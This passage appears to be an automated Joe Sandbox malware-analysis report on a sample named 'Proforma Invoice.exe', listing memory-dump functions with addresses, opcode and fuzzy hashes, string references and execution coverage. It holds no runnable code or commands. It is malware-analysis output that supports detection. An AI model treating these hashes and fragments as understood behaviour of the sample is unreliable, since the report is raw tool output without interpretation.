Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f94ae68960bffcae3a16ca723f9c8f713f26bddd1cba39e1d7215b4703ec51b4
Instruction ID: 93425f8c319d05940b13bcd08b33b6419e534477878084d077fab3a9c8b63e8c
Opcode Fuzzy Hash: f94ae68960bffcae3a16ca723f9c8f713f26bddd1cba39e1d7215b4703ec51b4
Instruction Fuzzy Hash: 66F03074D08309EFDB80DFADDA442ECBBB8AF49310F10A0BD9409A3201D6310A41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 06ECD2A8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e23fbfe1b1735ddfcb9fee16dd60438c9f35ecd6ba6de851447b9c2b233b2cc
Instruction ID: faa010f64a7ba715c16871b953754d9cf42c0fa584545722a5a22cb6988abdd9
Opcode Fuzzy Hash: 3e23fbfe1b1735ddfcb9fee16dd60438c9f35ecd6ba6de851447b9c2b233b2cc
Instruction Fuzzy Hash: CBE0ED74E04208EFC784DFE8D5506ACBBF4EB88314F10C0A9980893340D6359E42CF40

Uniqueness

Uniqueness Score: -1.00%

Function 06ECFE70 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcfbf57f9ad4aea056842079e8c562297ad67f1c126fe86c738201472d7f82f7
Instruction ID: d41e81cc57588bc42ae20d1618406b110274fa3cb4e10e72fb29ffede3c347ce
Opcode Fuzzy Hash: bcfbf57f9ad4aea056842079e8c562297ad67f1c126fe86c738201472d7f82f7
Instruction Fuzzy Hash: 93E0E574E04208EFCB84DFE8D5416ACBBF5EB88324F10C5E9981993341DB359A02CF80

Uniqueness

Uniqueness Score: -1.00%

Function 06ECE388 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 542913f030040b48112c45c72dd4f8bca772af873d8801f0290eb382f39cbf01
Instruction ID: b21f2d1df1b0951946d5b2bbfe85fc808084ee3062a36f528f1f4532501728dd
Opcode Fuzzy Hash: 542913f030040b48112c45c72dd4f8bca772af873d8801f0290eb382f39cbf01
Instruction Fuzzy Hash: F4E08C7484520CDFD740DFF9A6095AE7BF9EB89224F0054A9A00A93220EB319A01D791

Uniqueness

Uniqueness Score: -1.00%

Function 06ECD088 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65399dde0a11fef29bf34cad5120355c7db9c27a3caec4a1170b62084d0a5e70
Instruction ID: 2cbec7394b51402ca77ec6e6e63a1b21fc756bd63ddd22b6f0491be812272007
Opcode Fuzzy Hash: 65399dde0a11fef29bf34cad5120355c7db9c27a3caec4a1170b62084d0a5e70
Instruction Fuzzy Hash: 2DE0EC78D15209DFC780EFA8D9456EDBBB5EB44215F2051B9980893340EB715F92CB41

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 06ECE3D0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06ECE4A2

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 96aa157b933aab815cf860fc7aa1383ff8888048a92081f88b70f2855a0ec6c9
Instruction ID: a76c9263f1d36009921ce0c3ac584a4845ae3423b5c4bc7af4781be55c316008
Opcode Fuzzy Hash: 96aa157b933aab815cf860fc7aa1383ff8888048a92081f88b70f2855a0ec6c9
Instruction Fuzzy Hash: CC611B71A112088FDB48DF7AE960A9ABBF7FBC8300F14C57AD00597368EB74594A9B41

Uniqueness

Uniqueness Score: -1.00%

Function 06EC6AE8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

/, xrefs: 06EC8A70

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 5a2acc2c0916aa8f29fb1dfe735617ca0bce7fe8acdfac461a5acbc4e62c0e09
Instruction ID: 8e1277c7695fb17b98be1a557df57e5e3e07456a61d051870b0e799a8059891d
Opcode Fuzzy Hash: 5a2acc2c0916aa8f29fb1dfe735617ca0bce7fe8acdfac461a5acbc4e62c0e09
Instruction Fuzzy Hash: BF415F71E05A588BEB6CCF6B8D4069BFAF7AFC9311F14D1B9941CAB259DB3005828E11

Uniqueness

Uniqueness Score: -1.00%

Function 050BF090 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0213ab72d12044d99781b86795699d1822c283a41f63b67a984431a5e264e3a2
Instruction ID: 6e95ec6edd9b7158557cad05453ba5452692daf03a1813a2d259a32555225ffb
Opcode Fuzzy Hash: 0213ab72d12044d99781b86795699d1822c283a41f63b67a984431a5e264e3a2
Instruction Fuzzy Hash: D5D1AC707047018FEB29EB75E8907EEB7EBAF88700F14886ED5469B2A0CB75E841C751

Uniqueness

Uniqueness Score: -1.00%

Function 050B6669 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd5796acba7e4b4e3669394824ed31dca7e1a19f5c71d8810514154e9451e86f
Instruction ID: 538586d2042e8b2da6291774388bbc66199b3c63ccb82866fddd2d9aee9ffa41
Opcode Fuzzy Hash: dd5796acba7e4b4e3669394824ed31dca7e1a19f5c71d8810514154e9451e86f
Instruction Fuzzy Hash: 8DE11A74E002198FDB14DFA9D5809AEFBF2FF88304F24816AD815AB356D771A942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 050B8188 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe049da9c9b2a64a40a15ecf1ea3017284e4accb63412f033f1431ff087f1c76
Instruction ID: a52b0e4ff4363e1f944fbce7aa926b6c94a5bf6005d26c49f3456f3a6ec04340
Opcode Fuzzy Hash: fe049da9c9b2a64a40a15ecf1ea3017284e4accb63412f033f1431ff087f1c76
Instruction Fuzzy Hash: 8FE1F974E002198FDB14DFA9D5809AEBBF2FF89304F24C16AD814AB366D771A941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 050B7D50 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 756462539ed99187ebb6d8b446d9610a5fe613c2688174466bf0f6ca66c6e4c0
Instruction ID: 225dbfa7eafc326cfcc1f8e7c0b26be418d77964f0c8d3678f0adb0eacad3635
Opcode Fuzzy Hash: 756462539ed99187ebb6d8b446d9610a5fe613c2688174466bf0f6ca66c6e4c0
Instruction Fuzzy Hash: 3DE10A74E042198FDB14DFA9D5809AEFBF2FF89304F24816AE814A7356D771A942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 050B8B88 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9ec6e6a820723c54b69df182a1dba73d3f614716704eb9f65220bad94d30c2
Instruction ID: eb8a55362064fcaa93bdb40d709f045cc7b09a2e6286a8e1342bf9362bff7e99
Opcode Fuzzy Hash: 9c9ec6e6a820723c54b69df182a1dba73d3f614716704eb9f65220bad94d30c2
Instruction Fuzzy Hash: 81E1EA74E041198FDB14DFA9D5809AEBBF2FF89304F24C15AE814A7366D771A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 050B6AB0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27460800da70e0611bb211d154fba11922ef79a5964f8bebf10f6e272b1a86d8
Instruction ID: 6ae67c0ecac61d5eff48b6535f32a783053bd5ef2ffe70e5c40d6ecea5adfa0b
Opcode Fuzzy Hash: 27460800da70e0611bb211d154fba11922ef79a5964f8bebf10f6e272b1a86d8
Instruction Fuzzy Hash: 82E10B74E002198FDB14DFA9D5809AEFBF2FF89304F24816AD815AB356D771A942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 050B7D3F Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df6c0431f4cfae3151443b64c3c9f7d15065ca8a70c25453a5c9a1231206671
Instruction ID: ffbd94fafe74c374e06d0cbfd6812feb7be09f93758ebd62d2b6da53b52be7c3
Opcode Fuzzy Hash: 7df6c0431f4cfae3151443b64c3c9f7d15065ca8a70c25453a5c9a1231206671
Instruction Fuzzy Hash: EE512A75E042198BDB14CFA9D5809EEBBF2FF89314F24816AD818A7216D7315A42CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 050B6AAC Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 634e0c93bd3b9315816785b5be91119925629b32fe4d45b9f3f3a72f912aeb41
Instruction ID: 7506e43dc7dacb2e0d97fd278ff70f2e0fe0ec3d27b6f496481c07d64cbfc575
Opcode Fuzzy Hash: 634e0c93bd3b9315816785b5be91119925629b32fe4d45b9f3f3a72f912aeb41
Instruction Fuzzy Hash: FF511C74E042198BDB14CFA9D9809AEBBF2FF89304F24C16AD818A7356D7315A42CF61

Uniqueness

Uniqueness Score: -1.00%

Function 050B6AA0 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dbcdcc6e16d17f49ea2bd14607c62a98884defe65cab27a95f1dfcde82b9e4a
Instruction ID: fa8e817e21807b9858637bc8c6f43d2e6a24a236f77c2ba32025fadb60280275
Opcode Fuzzy Hash: 9dbcdcc6e16d17f49ea2bd14607c62a98884defe65cab27a95f1dfcde82b9e4a
Instruction Fuzzy Hash: A851FA74E042198FDB14CFA9D5809AEBBF2FF89304F24C16AD418A7356D7319A46CF61

Uniqueness

Uniqueness Score: -1.00%

Function 06EC0006 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbaff079f0710782dcb81f7cb1d727938ee0eaf523d38a4b3947337e9085a51e
Instruction ID: 51087dd3b79ebd1e1e7219cacba0929537ff8fa9e46d90620481451e11497883
Opcode Fuzzy Hash: fbaff079f0710782dcb81f7cb1d727938ee0eaf523d38a4b3947337e9085a51e
Instruction Fuzzy Hash: 36419E71D05B548FEB59CF6B8D4069AFBF3AFC9210F18C1FAD44CAA265DA3409468F11

Uniqueness

Uniqueness Score: -1.00%

Function 06EC0040 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f30e336964d90b75ec13318d280be74c87a4cf5a48fae8e5dee35058e84508f1
Instruction ID: 2b3a70d5238d26db720c21d69c6257a58adeca08578d06bb0ae06317f5a704a5
Opcode Fuzzy Hash: f30e336964d90b75ec13318d280be74c87a4cf5a48fae8e5dee35058e84508f1
Instruction Fuzzy Hash: 9C415F71D01B188BEB68CF6B8D4079AFAF3BFC9211F14D1BAD40CA6255DB7019868F11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Proforma Invoice.exePID: 7372, Parent PID: 6412COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	59
Total number of Limit Nodes:	9

Executed Functions

Function 06C22350 Relevance: 9.0, Strings: 6, Instructions: 1499COMMON

Download Yara Rule

Strings

$^q, xrefs: 06C2378F
$^q, xrefs: 06C2379B
$^q, xrefs: 06C23742
$^q, xrefs: 06C2374E
$^q, xrefs: 06C23777
$^q, xrefs: 06C2376B

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 49d170dc25e3640044d82fb74c11275185098fb03fb9012a6b1f06eec31f0c9b
Instruction ID: c688b2a5b7f5f6bc47712605d7a086402a9c0ca8dd1f710574b99396442b93f8
Opcode Fuzzy Hash: 49d170dc25e3640044d82fb74c11275185098fb03fb9012a6b1f06eec31f0c9b
Instruction Fuzzy Hash: BED24C34E00216CFCB64DF68C584A9DB7B2FF85310F5485A9D849AB365DB38EE85CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06C2B248 Relevance: 8.3, Strings: 6, Instructions: 773COMMON

Download Yara Rule

Strings

$^q, xrefs: 06C2BC1D
$^q, xrefs: 06C2BBB5
$^q, xrefs: 06C2BBDD
$^q, xrefs: 06C2BBE9
$^q, xrefs: 06C2BC11
$^q, xrefs: 06C2BBA9

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 69b56e82469c3061a671f25bb72fcea63c5b3f4f5c75a06852078313fb853453
Instruction ID: fd04431f7730cbde470e33f30ddd2b142950c096f925c0704eb841166331f5c6
Opcode Fuzzy Hash: 69b56e82469c3061a671f25bb72fcea63c5b3f4f5c75a06852078313fb853453
Instruction Fuzzy Hash: 4C52C330E1021A8FDF64DF69C58076DB7B2FB85318F24892AE809EB355DB35DD818B91

Uniqueness

Uniqueness Score: -1.00%

Function 06C27D90 Relevance: 3.0, Strings: 2, Instructions: 474
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06C280F3
$^q, xrefs: 06C280FF

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: fdc40123fb6db8a14e55b6b8d9e74734dcbfdd1f9f5269609707d5e6b830ba87
Instruction ID: bc4091927a4e56a1a9c0f4dfc058a0b276c201905fee3be532e548593baefe6f
Opcode Fuzzy Hash: fdc40123fb6db8a14e55b6b8d9e74734dcbfdd1f9f5269609707d5e6b830ba87
Instruction Fuzzy Hash: 1102D130B012168FDB54DF69D9906AEB7E2FF84304F148569D80AEB390DB35ED86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06C265E8 Relevance: .8, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 454347825f4b7672a86b00058a7690411098dbcd0d3eeb5334028d7a84afd0a4
Instruction ID: 775a7fff7bd3aec99bae71c026cdc32121cd653011c63ed8c9ec0349b8916ada
Opcode Fuzzy Hash: 454347825f4b7672a86b00058a7690411098dbcd0d3eeb5334028d7a84afd0a4
Instruction Fuzzy Hash: B7629F34A002168FDB54DB69D584BADB7F2FF88314F148469E81AEB350DB35ED46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06C255A0 Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 840dfd9b2a982bddd0e9c02a2ea0f319bb6245e441f46ce6b59df5126de88b84
Instruction ID: 57e5f81af57d43eaaa78c55c4d4a564db3982cb0e8c15e46fbaf83a12f38863f
Opcode Fuzzy Hash: 840dfd9b2a982bddd0e9c02a2ea0f319bb6245e441f46ce6b59df5126de88b84
Instruction Fuzzy Hash: 8922C175E102268FDB64DB68C4806AFB7F2EF89314F64846AD815EB340DB35DD42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06C2ACE0 Relevance: 10.4, Strings: 8, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06C2AE8F
$^q, xrefs: 06C2AE0D
$^q, xrefs: 06C2AEAC
$^q, xrefs: 06C2AE83
$^q, xrefs: 06C2AEB8
$^q, xrefs: 06C2AE60
$^q, xrefs: 06C2AE01
$^q, xrefs: 06C2AE54

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 730da5fe8890968242d37adfd2a497250af8c0995fece36e016e5acfca9b2825
Instruction ID: f727e81c0fa671ce92bf32872d31b529ede60ab5d24d71b227f7bea8f193c928
Opcode Fuzzy Hash: 730da5fe8890968242d37adfd2a497250af8c0995fece36e016e5acfca9b2825
Instruction Fuzzy Hash: BCE18C30E1021A8FDB59DFA9D8806AEB7B2EF84704F20892DD805AB354DB35DD46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06C29160 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06C291E2
$^q, xrefs: 06C291A7
$^q, xrefs: 06C291EE
$^q, xrefs: 06C291B3

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 4b6c4306a83339bbbadbc7c6612bef6e93e7556f1d5ec2dd1b8c6fffff4c4274
Instruction ID: 17575cdb97b9e68c9eb5095fd46bd7692ca586e7d4065191811d87e1d6a6a0ff
Opcode Fuzzy Hash: 4b6c4306a83339bbbadbc7c6612bef6e93e7556f1d5ec2dd1b8c6fffff4c4274
Instruction Fuzzy Hash: 27915F30F0021A9FDB54DF66D9507AEB3F6EFCA604F108569C809EB344EA75DD828B91

Uniqueness

Uniqueness Score: -1.00%

Function 06C2CF48 Relevance: 4.5, Strings: 3, Instructions: 796
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06C2D353
$^q, xrefs: 06C2D33F
$^q, xrefs: 06C2D347

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 16625dc69a42c95423e0c6e78bafaa3764aab428b0cf084468a83dd61a47e904
Instruction ID: 8ecb2e9f77f059fc1c53700c6f420a40af123abd7f28d4df9ab926628c657258
Opcode Fuzzy Hash: 16625dc69a42c95423e0c6e78bafaa3764aab428b0cf084468a83dd61a47e904
Instruction Fuzzy Hash: CA624030A002168FCB55EF68D690A5EB7B2FF84304F208979D4469F369DB75ED86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06C24B70 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 06C24CC1
\Ocq, xrefs: 06C24D4B
fcq, xrefs: 06C24B9B

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 5729cf6bd8b3054aa94e0c371066df6001ffdef1e88a06fee26b02b550980d7a
Instruction ID: d012552a77afc70322cd8419ae81dbfe5021e2a775388f7bc30ce4ee13c023de
Opcode Fuzzy Hash: 5729cf6bd8b3054aa94e0c371066df6001ffdef1e88a06fee26b02b550980d7a
Instruction Fuzzy Hash: DA61A170F102199FEB589FA9C8547AEBBF6FB88700F20842AD505AB391DF758D428F51

Uniqueness

Uniqueness Score: -1.00%

Function 06C29151 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06C291E2
$^q, xrefs: 06C291A7

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: aecb681b88423ea336d428d941a3c097a9b7684afe93ee868e78bd2931463e2d
Instruction ID: e46f0b99d56e9acc8f65ad7aa9c6fc1054b13c98c421c9dba356afade5f3a23e
Opcode Fuzzy Hash: aecb681b88423ea336d428d941a3c097a9b7684afe93ee868e78bd2931463e2d
Instruction Fuzzy Hash: 3C516330B002169FEB54DF76D990B6F73F6EBCA644F108469C909EB344EA35DC428B91

Uniqueness

Uniqueness Score: -1.00%

Function 06C24B60 Relevance: 2.6, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 06C24CC1
fcq, xrefs: 06C24B9B

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: 2567d6bc449256d097947010d214ca6cc897c3826accf8cb73b8809dbb4a64d9
Instruction ID: 287098338d97c8fc6c074a39a421e0cae45c81d71b5904b90cc0ab52920eaf26
Opcode Fuzzy Hash: 2567d6bc449256d097947010d214ca6cc897c3826accf8cb73b8809dbb4a64d9
Instruction Fuzzy Hash: 66518070F102199FDB589FB9C8547AEBAF7FF88700F20852AD505AB395DB758C028B91

Uniqueness

Uniqueness Score: -1.00%

Function 013CEB48 Relevance: 1.6, APIs: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.4091087852.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13c0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f019d52819aaf486249c2880ae488be3f4040668b6650e04af72fb63de1801c
Instruction ID: 7d43b0c7057e440bf5da960484be64a046f97e7be53524e637dfdf3b8353b4fe
Opcode Fuzzy Hash: 7f019d52819aaf486249c2880ae488be3f4040668b6650e04af72fb63de1801c
Instruction Fuzzy Hash: 5B412272E0435A8FDB04DFB9D8042EEBFF1AF89210F14866AD908A3351DB749845CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 06C2DAD0 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06C2DC19

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 6629477b8447c2c8e229a5b51cd2ff35ace1494070f0ac917b3cab47e5e7f293
Instruction ID: d76582d083ac7c3fd20cee4ffe9d27807d90e94d3d8887b07215af8d91b8c06c
Opcode Fuzzy Hash: 6629477b8447c2c8e229a5b51cd2ff35ace1494070f0ac917b3cab47e5e7f293
Instruction Fuzzy Hash: 95419D70E0031A9FDB64DFA5C59469EBBB2FF85300F20452DE806E7240DB75EA86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06C2DABD Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06C2DC19

Memory Dump Source

Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: a7f284bffe3edf077ca673a5bfe442112ca5fc281cf6b8aaa2b408f3d96fffd9
Instruction ID: 365e77c577e475d95e7b29163460a803893cfca57864e299deeb943f568f9652
Opcode Fuzzy Hash: a7f284bffe3edf077ca673a5bfe442112ca5fc281cf6b8aaa2b408f3d96fffd9
